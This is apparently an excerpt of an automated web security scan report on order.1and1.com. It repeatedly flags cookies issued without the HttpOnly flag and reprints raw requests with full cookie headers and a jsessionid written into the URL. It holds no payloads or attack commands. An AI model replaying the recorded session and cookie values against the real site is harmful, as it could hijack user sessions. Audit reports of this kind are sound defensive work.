GET /xml/order/FeatureDomainDns HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3b7517c1ba0d2800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDomains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7a745aba1b129c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainPdr HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4cdcf90faf576c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDreamweaver HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6cf6138224e39000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailEmail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=548c6adb7fb0ec00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailVirusscan HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=ca8f83ac4f85c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailWebmail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3c09b335ce42b800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureFtpBackup HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4eea5ce422d8c800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureGuaranteeMoneyback HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=11ac57a25b290000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureMarketingCtrCitysearch HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
